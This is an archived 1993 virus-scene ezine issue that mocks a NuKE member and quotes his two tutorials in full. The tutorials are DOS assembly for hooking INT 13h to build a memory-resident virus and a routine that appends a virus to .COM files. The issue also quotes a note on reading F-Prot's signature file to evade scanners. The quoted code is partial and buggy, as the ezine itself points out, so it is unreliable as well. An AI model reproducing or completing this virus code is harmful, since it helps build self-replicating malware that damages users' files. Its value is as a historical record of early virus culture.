Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

2 Much Thinking Issue 0

eZine's profile picture
eZine lover (@eZine)
Published in 
2 Much Thinking
 · 12 Mar 2022

[07.14.93]   _______ 
            /  ___  \ 
            |_|   \  | 
                  |  | 
                 /  / 
               /  / 
             /  /_____ 
            |_________| Much Thinking Issue #0 

                 The File Writer Presents... 
  -* Will Rock Steady ever know what he is talking about? *- 

 _______________________________________________________________________ 
/ Disclaimer:                                                           \ 
|        If we happen to mention you in this text and you happen to find | 
| it offensive well please, don't CRY!  We don't give a damn if you find | 
| it offensive.  This is just our thoughts put into a text file and      | 
| released to the public.  All of it is the truth and only people that   | 
| are hiding something will find it offensive.  Enjoy...                 | 
\_______________________________________________________________________/ 

2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT-2MT


2MT is just a collection of thoughts about things that are on peoples minds today. Some may be funny some may be offensive. Anyhow most of our points will be supported by facts. A new issue will be released everytime a new topic comes up.

If you would like to respond please just create a text file with the same name but an 'R' in the extention. For example if you would like to respond to this issue name the file '2MT-0.TXR'. Then distribute it and it will eventually get to one of the authors. Please only those who are directly effected by the topic need to respond. We don't want 50 text running around with the same name. Enjoy...

- 2MT President -

P.S. We frankly don't care about the spelling. At least you will know what we are talking about. If you have a problem with the grammer then PHUCK OFF!

2MT-2MT-2MT-2MT-2MT

Will Rocko ever know what he is talking about? I doubt it. Judging from what he has tried to talk about in the past and today it all sounds like garbage. To put it simple... He just doesn't have any clue what he is doing. I don't know why he is in the virus world. The "fame" of nuke has nothing to do with him. He just spread the name with his big mouth. All the work done by him is garbage.

Rocko always claimed that his code was 100% working but it never did. Well maybe a couple of times but most of the time it just made no sense. We will first back up these accusations with a couple articles written by him in the past NK-Info's and then continue.

First there was Nk-Info2. The great Rock tried to take it upon himself to teach everyone how to write memory resident viruses. Well the code he gave was garbage and is never used by viruses. A clear example that he had no idea what he was talking about. Read the article for yourself.


Contruction Kit for TSR Virii

Rock Steady

There are several ways to constructed your viruses. Mainly you have those which are RAM-Resident or better known as a TSR program. And with great thought we have those which are not RAM-Resident.

A TSR virus will load into memory and can infect all programs that are executed by the computer. Such like my AmiLiA virus which will infect all EXE and COM files that are ran. Anyhow a TSR virus can certainly spread a lot faster compared to a Non-Resident Virus. Because a NON-Resident Virus will only infect file each time it is ran. Though the NON-Resident will start off very slowly infecting the system files but after the virus is in the system after a number of weeks, it will certainly infect ALL files that are in the system. Where a TSR virus will USUALLY infect files that are executed. So that only files that are often executed will be infected. But The TSR virus can certainly infect A LOT more files than a Non-Resident JUST on the first Hour! It is out numbered 10 to 1. This is the advantage that all programmers enjoy and program TSR viruses. I will explain a SIMPLE method of making your program a TSR one. And it will be as flexible as you want so that NO ONE can stay you `Stole' this information off Rock Steady.

Anyhow I will explain the simple Process of Intercepting ROM-Bios Interrupts and hooking your virus/Program to any Interrupt of your choice. This method that is being explained is also used ALL the Jerusalem Strains. And several of the Vacsina Strains. They total up to close to 100+ Viruses that use this simple way with the TSR Interrupt 27h. Anyhow just because I'm explaining this method your virus CANNOT be detected because of this TSR routines because there are routines I DEVELOPED ALONE and will soon to be release in one of my future virii. Anyhow there are an UNLIMITED amount of ways to make TSRs so that along as you Develop YOUR OWN routine it will NEVER get detected as a virus for all you Beginners. And how this routine can be used in several OTHER utilities not just viruses.

Beginning...
First we must Intercept an Interrupt, Lets say we want our virus to activate Every TIME the disk I/O is being used we would use INT 13h or INT 21h. The INT 13h will activate everytime ANY file is opened or Closed And the INT 21h will activity anytime any file is executed or any INT 21h functions Like a "DIR" in DOS. If you want you can even hooked your virus to INT 10h and it may activate when Graphics are displayed, or you can hook it to the interrupt involved with Printer Functions. Whatever seems to `EnLighten' you, since we live in a Distressed world, I won't even bother why we shouldn't hooked them up to just ANY interrupt.

Anyhow, interrupts use a vector table at the bottom of memory (ROM) to find out what routine in the ROM Bios to call. So the address for Interrupt 21h would be located at 0000:0084 and for Interrupt 13h it would be found at 0000:004Ch. So we can change theses addresses in the vector table. What we do is we change the vector address to POINT to our virus. So everytime the Interrupt is called it goes to the vector table and the table tells it to call our Virus, rather than calling the ROM Bios. But what MUST do FIRST is save the ORIGINAL Interrupt routine and place that somewhere in memory. So that our virus will call the Original ROM Bios routine after executing itself.

Lets say we hooked our Virus to the INT 13h, which controls all Disk Activities. So if our Computer users tries to read something from the disk the Computer will call the INT 13h bios Routines on How To do it. But instead of finding the INT 13h routines it calls our virus, and the Virus gets ran, which then our virus does what it has to do, and then runs the Original INT 13h Routine where-ever it was stored. So it simulates an INT call to the ROM bios routines. 

;---------------------------------------------------------------- 
; Sample Program on how to Hook your virus to an Interrupt call. 
;---------------------------------------------------------------- 
Code        Segment 
        Assume  cs:code,ss:code,ds:code,es:code 
        Org     100h       ; Guess this will be a COM file? Huh? 

 
Begin:  JMP     Bios_Routine 

        NOP                  ; This is just a cheap .COM file that the 
        NOP                  ; virus is attached to. Remember you should 
        NOP                  ; have the first 3 bytes written in your 
        INT     20h          ; virus. 

OLD_ROM_INT     DD      ?    ;Our Stack to save the OLD Int Address 

;---------------------------------------------------------------- 
; This Calls the VIRUS and then the simulates the OLD Rom Routine 
;---------------------------------------------------------------- 
Virus_Codes    PROC     FAR 
       Assume  cs:code, ds:nothing 

       pushf               ; Everytime the ROM-Routine is call this 
       push    ax          ; is what happens... Saves the Regesters 
       push    di          ; And runs Our Virus... Then it restores 
       push    si          ; the regesters and Runs the OLD_ROM Bios 
       push    es          ; Routine that was supposed to be ran in 
       push    ds          ; the first place... 
       call    The_Virus 
       pop     ds          ;NoTe: It's better to SAVE all Regesters and 
       pop     es          ; Flags because our Virus WILL ALTER a few 
       pop     si          ; And when the Virus leaves control back to the 
       pop     di          ; Computer it is EXPECTED to continue where it 
       pop     ax          ; It left off... 
       popf 

       pushf            ; This `pushf' is NEEDED to act like a simulated 
       call    OLD_ROM_INT       ; ROM Bios Interrupt call... 

       ret 
Virus_Codes   ENDP 

;---------------------------------------------------------------- 
; Put the REAL Virus Codes here... 
;---------------------------------------------------------------- 
The_Virus        PROC    NEAR 
       ...            ; Put your OWN Virus codes here... 
       ...            ; Just make it compatible with our 
       ...            ; Codes... Try to make it small and 
       ...            ; it will take up less space in the 
       ...            ; users' memory. 
       ... 
       ...            ;NoTe: Try to infect files that are ONLY 
       ...            ; Executed! Rather than each time the INT 
       ...            ; is used... Get it? 
       RET 
The_Virus      ENDP 

;--------------------------------------------------------------- 
; This is the Procedure that SAVE the OLD_ROM Bios in our Virus 
; And places a Call to point to our Virus. Which then Calls the 
; OLD_ROM Bios Routine. So Remember to SAVE it first. 
;--------------------------------------------------------------- 
Bios_Routine   PROC    NEAR 
       Assume  cs:code,ds:code 

       mov     ah,35h      ; This Asks for the interrupt vector! 
       mov     al,13h      ; whatever is in AL is what int vector 
       int     21h         ; address you get and is stored in ES:BX 

       mov     word ptr OLD_ROM_INT,bx ;Save the BX register in our Stack 
       mov     word ptr OLD_ROM_INT[2],es ;And same to the ES Register 

; Here you SHOULD put a small routine to check if the Interrupt vector has 
; already been changed! For INT 13h this should contain 0000:004Ch the 
; formula for this is (Interrupt # times 4) For INT 21h it is (21h x 4)=84h 
; and so on. So if its been changed it means the virus has already changed 
; it! And it `Should' be resident. How ever this is a simple way of doing 
; it. but not always the BEST way... Because any program the hooks to the 
; virus interrupt will fool the virus to think it is already resident. 
; Though this source is NOT for the Professional Virus Programmer like myself 
; because WE KNOW! But for those that are half way there... 

       mov     ah,25h    ; This asks to set a Interrupt vector address! 
       mov     al,13h    ; Interrupt # to be set goes in AL 
       mov     dx,offset Virus_Codes ; Sets INT 13h to point to `Virus Code' 
       int     21h 

       mov     dx,offset Bios_Routine 
       int     27h 
Bios_Routine     ENDP 

;  Anything after this point will not be memory resident. because the end 
;  of the resident portion ends at `Bios_Routine' procedure. 

Code        ENDS 
     END    Begin 
;----------------------------- EnD ----------------------------------


Simple isn't it? Anyhow I tried to make this as simple as possible. I hope I didn't lose you. Anyhow this is a simple routine that several TSR virii use. Anyhow, see what that gives you....


Rock Steady NukE / Viral Development Researcher

-PeAcE-

Haha.. thats always worth a good laugh. It just doesn't make sense. But to him this was a major break through.

The next article he tries to teach all how to infect .COM files.
He forgets one major thing. The delta offset. You need one of those.
Well read it and try to write one with the information presented.


Construction Kit on infecting .COM

Rock Steady

Well I must state my opinion that there are certainly WAY too many Overwriting Viruses out here. To help put a Stop to this I will try to explain to you a SIMPLE way to infect COM files at the END of the Program. This routine WORKS if you follow my steps correctly, and I've already used this in my `ParaSite ][' Virus.

Anyhow this is a brief description what the ASM Source will do.

  1. Find a .COM file in the current Directory
  2. Save the Date and File's Attribute.
  3. Save the First 3 Bytes in a Stack
  4. Infect the File & restore new 3 bytes..
  5. Put the OLD date and File Attributes back on

Beginning... 

;---------------------------------------------------------------------- 
; The Simple routine to Search for a .COM File... 
;---------------------------------------------------------------------- 
com_files       db      "*.com",0 

        mov     ah,4eh          ;point to a *.COM file... 
        mov     dx,com_files 
        mov     cx,3            ;Attributes with ReadOnly or Hidden 
        int     21h             ;is A okay... 

        cmp     ax,12h          ;Any files found? 
        je      exit            ;If no Files found Exit... 
        jmp     found_file 
; Instead of Exiting here you can make the Virus go and change dir and 
; look for several other .com files else where... with the help of the 
; path or simply searching for more <dir>... 

found_file: 
        mov     di,[si+file] ;di points to the filename 
        push    si 
        add     si,file          ;si points to filename... 

        mov     ax,offset 4300h  ;get file Attributes... 
        mov     dx,si            ;filename in dx.. 
        int     21h 

        mov     file_attrib,cx   ;Save file Attributes. 

file    dw      0 
; Here we'll set the file attributes to nothing 

        mov     ax,offset 4301h    ;To set file Attributes... 
        mov     cx,offset 0fffeh   ;Set them to a Normal File 
        mov     dx,si              ;filename... 
        int     21h 

        mov     ax,offset 3d02h    ;Open File to Read/Write. 
        mov     dx,si              ;ASCIIZ filename 
        int     21h 

        jnb     ok                 ;If file was open continue 
        jmp     put_old_attrib     ; error happened restore old attribs 
                                   ; and quit. 
ok: 
        mov     bx,ax 
        mov     ax,offset 5700h    ;Get File Date & Time... 
        int     21h 

        mov     old_time,cx        ;Save old File Time... 
        mov     old_date,dx        ;Save old File Date 

old_time        db      0 
old_date        db      0 

; here we infect the file... but first we SAVE the first 3 bytes 
; somewhere in our virus 

        mov     ah,3fh          ;Read file... 
        mov     cx,3            ;Number of bytes to read 
        mov     dx,first_3      ;Save bytes in the buffer 
        add     dx,si           ;Filename... 
        int     21h 

        cmp     ax,3            ;Where 3 bytes read? 
        jnz     fix_file        ;If not fix file like before and quit 

first_3     equ     $    ; The First three bytes of the Original File! 
            int     20h  ; the virus is infected to. 
            nop 

; This moves the File pointer to the END of the file 

        mov     ax,offset 4202h 
        mov     cx,0 
        mov     dx,0 
        int     21h 
        mov     cx,ax          ;DX:AX is the FILESIZE! 
        sub     ax,3           ;subtract three because of file pointer 

        add     cx,offset c_len_y 
        mov     di,si 
        sub     di,offset c_len_x 
        mov     [di],cx        ;Modifies the 2nd & 3rd bytes of program 

; The writes our virus to the file 

        mov     ah,40h 
        mov     cx,virlength      ;Virus Length 
        mov     dx,si             ;File... 
        sub     dx,offset codelength  ;Length of virus codes. 
        int     21h 

        cmp     ax,offset virlength   ;all bytes written? 
        jnz     fix_file              ;If no fix file and quit 

;Moves the file pointer to the beginning of file and write the 
;3 bytes JMP at the beginning of the file 

        mov     ax,offset 4200h 
        mov     cx,0 
        mov     dx,0 
        int     21h 

        mov     ah,40h       ;Write to file... 
        mov     cx,3         ;# of bytes to write... 
        mov     dx,si        ;File name... 
        add     dx,jump      ;Point to the new JMP statement 
        int     21h 

jump    db      0e9h    ;This is the JMP that will be put in the 
                        ;Begining of the file! 

;Restore Old File Time & Date 

fix_file: 
        mov     dx,old_date     ;Old File Date 
        mov     cx,old_time     ;Old file Time... 
        and     cx,offset 0ffe0h ;Flat Attribs. 
        mov     ax,offset 5701h 
        int     21h 

        mov     ah,3eh 
        int     21h             ;Close file... 

 
; Here we'll restore the old file attributes... 

put_old_attrib: 
        mov     ax,offset 4301h 
        mov     cx,old_att      ;old File Attributes. 
        mov     dx,si           ;Filename... 
        int     21h 

;----------------------------- EnD -------------------------------------


Anyhow that's it... Simple no? This source was also used in my ParaSite ][ Virus that is STILL undetectable to date with Scanv85. Anyhow I even made it MORE simpler than my real sources that have to play with the file paths.

Anyhow theres still work to be done, like you must restore the old data file so it will jump to 100h and run the old file the virus was infected too! Remember to store them in the beginning and then restore them! Anyhow there's a few Variables to be put in like `VirLength' which you should know how to do that also the `CodeLength' that is the VIRUS codes ONLY not counting the Stacks.

Anyhow This works FINE with a Non-Resident Virus. Because a few statements would have to be edited for TSRs. Anyhow try to use this, it's small neat and fast.

Anyhow Perhaps next issue I will develop a SIMPLE Ram-Resident virus that infects COMs and EXEs to be released into the next issue! Though I just release this sources for you to LEARN! Rather than putting you name on my virus and releasing another strain on work I worked Hard upon! Anyhow I should release a SIMPLE new Virus source for all you programmers out there! And I will even explain a few Stealth Technics like how to hide your program in memory right under the TOM.

If there's Any Questions you want to know, please ask them I will answer them in the next [NukE] Releases... I may even release source codes on how to make an Algorithm Encryption method! I've developed one on my own, without the V2PX viruses sources... Anyhow it does the job and the formula I developed has an UNLIMITED amount of encryption methods! But since the virus codes have to be SMALL Like close to 2,000 bytes I will limit the formula to about 1,000 different combinations!


Rock Steady NukE / Viral Development Reaseacher

-PeAcE- 

       mov     ax,offset 4301h    ;To set file Attributes... 
       mov     cx,offset 0fffeh   ;Set them to a Normal File 
                  ^^^^^^


He didn't even know how to program in assembly talk about infect .COM files. Pure Jokes. Anyways read the last couple of paragraphs. They are worth a couple of laughs. As if anything he states in them was true. Where are they today?

I was going to use another exampel from NK-INFO3 where he state they made a varient of Ping-Pong that works on 286+ but I can't bother. Here's a more moder example. Taken from a messege directly from Nukes own net. It talk's about how the scan strings are stored in F-Prot. We tried this and it didn't work so I have no idea of what he was talking about. Maybe he can go into greater detail. All comments are enclosed with { }.

Yeah, I believe we already posted how it was done in Scan, as I remember scan adds 90h to its strings, and when it compares the code, it adds 90h to the code so it matches the strings... etc... {Never tried this.}

Fprot I posted a while back... the Sign.def, is arrange in two main parts... First we have all the Signature Strings, and then we have the all the names at the bottom... 

Eg:   08 EA 49 40 20 48 94 20 49 08-03 
      |                       |    | 
      |                       |   If you JUMP this distance from this location 
      |                       |   you will find the beginning of the virus name 
      |                       |   for this string @ 
      |                    This is the FIRST byte of the virus string! F-Prot 
      |                    writes the virus strings BACKWARDS, that way it 
      |                    doesn't interfer with other virus scanners that 
      |                    detect the same string. 
    This is the length of the virus scan string! When F-prot reads this it 
jumps 08h bytes front, and falls on (49h) which is the first byte of the virus 
scan string, and subtracts -1 each time...


If a match is found, you goto the address of the last two Bytes, and print the virus name that is there... @

@ The two points marked with this contradict themself. Read them again and you will see.

Now to test out his method we pull out the old F-Prot 208a and get the sign.def file. To test his theory the first so called string is... 

  04 DE 00 00 40 16-00 
  |           |    | 
  |           |    when we jump this far from this location we got 
  |           |    garbage 
  |           | 
  |           This should be the start of the string 
  The string is 4 bytes long.


This was the first bytes in the sign.def file and they made no sense at all. Maybe we'll wait till he releases the source to his program that gets the strings. If there is one.

Thats enough on poor Rocko. In his defence I would like to say that he has changed his ways a bit. And has shown that he does know a little about what he is talking about. Thats better than before. I just don't want to see him making fun of any new virus groups that come out saying their overwriter's are the best. Because he was just as lame, actually lamer when he started. Atleast new groups don't talk about bullshi....

The File Writer 

 ___________________________________________________ 
/ _______                                           \ 
|/  ___  \                                          | 
||_|   \  |                                         | 
|      |  |                                         | 
|     /  /               End Of File!               | 
|   /  /                                            | 
| /  /_____                                         | 
||_________| Much Thinking...(C) 1993               | 
\___________________________________________________/

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
20 May 2024
Sabung Ayam Online
guest's profile picture
@guest
19 May 2024
Situs Sabung Ayam Digmaan
guest's profile picture
@guest
19 May 2024
Thanks for great information I was looking for this info for my mission.
DrWatson's profile picture
@DrWatson
18 May 2024
It's a fascinating theory. No one actually knows what is inside the Earth. To date we have only assumptions based on indirect measuremen ...
DrWatson's profile picture
@DrWatson
18 May 2024
Ohh ... another comment 😁 My article is becoming very popular 😃
guest's profile picture
@guest
18 May 2024
오우쉤
guest's profile picture
@guest
18 May 2024
Is it true that in addition to the temperature, it must not undergo vibrations and/or movements during fermentation?
DrWatson's profile picture
@DrWatson
18 May 2024
Hi Jeroen :) I am happy to read your message. I remember playing with your starfield back in the days. I had a look at figuro.io and i ...
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
18 May 2024
Thank you for the comment 😊 This theory was formulated starting from the 17th century, when no appropriate scientific studies had yet been ...
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
18 May 2024
Many cultures are slowly disappearing also today and with them ancient knowledge thousands of years old. Ancient knowledge must be preserved ...
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT